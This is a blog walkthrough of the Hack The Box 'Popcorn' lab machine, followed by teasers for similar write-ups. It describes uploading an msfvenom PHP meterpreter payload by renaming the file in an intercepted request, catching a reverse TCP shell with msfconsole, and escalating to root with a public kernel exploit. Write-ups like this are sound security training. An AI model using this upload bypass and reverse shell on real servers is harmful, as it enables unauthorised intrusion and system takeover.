(HTB) Popcorn Walkthrough


Name: Popcorn

IP : 10.10.10.6

OS – linux

VM Author: ch4p
Writeup Author: Teck_K2


Nmap result

The port 80 is open so we will start enumerating port 80 with Nikto and dirb.
Nikto couldn't find anything interesting but with dirb, we find a new directory called torrent.
So we will go to that directory 10.10.10.6/torrent
Here we can sign up and can upload only (.torrent) file in which we can’t upload any shell.
So we will creat a new .torrent file and upload it, then we have now access to upload a screenshot which can be jpg,jpeg,png and Gif. so let’s go to new terminal and let’s generate our web payload using msfvenom.
After generating the file we will edit it because it is generatied in base64 , So we will go and edit the file, now add <?php in the beginning of (base64 encoding) and ?> in the end.
Now we will change its extension from php to .php;.png
We are doing this because the upload has image file restriction, which only allows image files to be uploaded but the restriction is only in browser not in the server, So what we will do is we will capture our request and change the extension and forward the msg to the server.

So our new file name would be shell.php;.png let’s upload it but we will not get any shell from this file extension because it end in .png so we need a .php file uploaded which is not allowed in the upload as I said above.

So we need to tamper the data which we can do with burp suit or tamper data tool in firefox.
Just search for the “filename = shell.php;.png” and edit it to “shell.php” and forward it ,

and edit it to “shell.php” and forward it. 

The file should be uploaded now refresh it and open msfconsole.

#  Use exploit/multi/handler
#  Set payload php/meterpreter/reverse_tcp
#  Set LHOST <IP>
#  Set LPORT <4444>
#  Run

Now go to the browser and open the screenshot which we uploaded in another tab,
We will get a meterpreter session,
So now we have the access to the user directory and got the user flag but we are restricted to access root directory so we need to do privilege escalation.
we know the kernel version which is 2.6.17-36 which we got from nmap result or you can also check it in meterpreter session which we have.

Now find and exploit which will escalate the privilege and will give us a root access to the machine.
Search in searchsploit if we are lucky we could get any exploit.

I tried all of these/local .c files but no result. After searching a lot I found this

The exploit ID is 15704. Let use try with this exploit.
If you have reverse shell in nc then you can create a new torrent file and upload it, Now you can copy the file from /var/www/torrent/upload to /tmp or if you have the meterpreter session like me then you can just upload directly to the /tmp folder.

Now compile the file and execute it
# gcc (filename.c) –o (filename)
#  ./(filename)

Now type (#id) you will see that you have root access, now you can read the flag from /root folder.


~Enjoy hacking and stay NOOB

TeckK2 Guru

Rank: 940 2 63

hackthebox.com


Comments

Post a Comment

Popular posts from this blog

(HTB) October Walkthrough

Image
Name: October IP : 10.10.10.16 OS – Linux VM Author: ch4p Writeup Author: Teck_K2 Nmap result Port 80 is open, Let’s access the web page By accessing the web I got to know that the target machine is using October CMS which is an open source self-hosted CMS platform based on the Laravel PHP framework. In the account section we can Signup and access the app but it is of no use. Now run the dirb and nikto tool and google some available exploit on October CMS Unfortunately I coundn’t find anything useful in the google and Nikto result but I found something useful. But In the Dirb result I found something useful which is /backend page with code:302 which means it will redirect us to somewhere else. Let’s open this in the browser. By accessing the link I got redirected to the Administrative area. Now we have the login page in front of us, we can do bruteforce attack, SQL-injection, etc.. Let’s try some manual brute-forcing. Let's try with (admin:password) It’s sh...
Read more

(HTB) Tenten Walkthrough

Image
Name: Tenten IP : 10.10.10.10 OS – linux VM Author: ch4p Writeup Author: Teck_K2 Nmap result In the target system only port 22 and 80 is open let's try to open it It’s a job portal site and powered by WordPress Let's try to find the version detail IN the /readme.html it’s showing me the version which is 4.7 Now as we now it’s a WordPress site now we will use wpscan It will start enumerating users We got only 1 user One of them is admin we will focus on him only Now we know the username we can try to bruteforce the password After several hours I got no result Let’s enumerate plugins We got 2 plugins installed As we can see one is akismet which is up to date and the second one is job-manger which is also up to date but one version of job manager which is 0.7.25 seems outdated and insecure. Let find out some exploit for that. I find this link in the wpscan description https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/htt...
Read more

(HTB) Arctic Walkthrough

Image
Name: Arctic IP : 10.10.10.11 OS – Windows VM Author: ch4p Writeup Author: Teck_K2 Nmap result First, try to find the exploit which is available for the particular services running on the target machine, I tried to find but couldn't find any exploit regarding MSRPC no we will jump to FMTP In the Port :8500 We can see there are two directories try to open both in new tabs Now Open all the subdirectories maybe we could find something interesting I n the sub-directory /cfdocs I found there is a cold fusing version 8 running If you see error something like this then don't worry because ColdFusion only allow 2 person at a time and if someone didn't sign out it will keep his session open, So just reset the machine and you are good to go. This blog maybe be helpful to understand cold fusion https://jumpespjump.blogspot.co.uk/2014/03/attacking-adobe-coldfusion.html In the above blog as describe to get the password hash didn’t work for...
Read more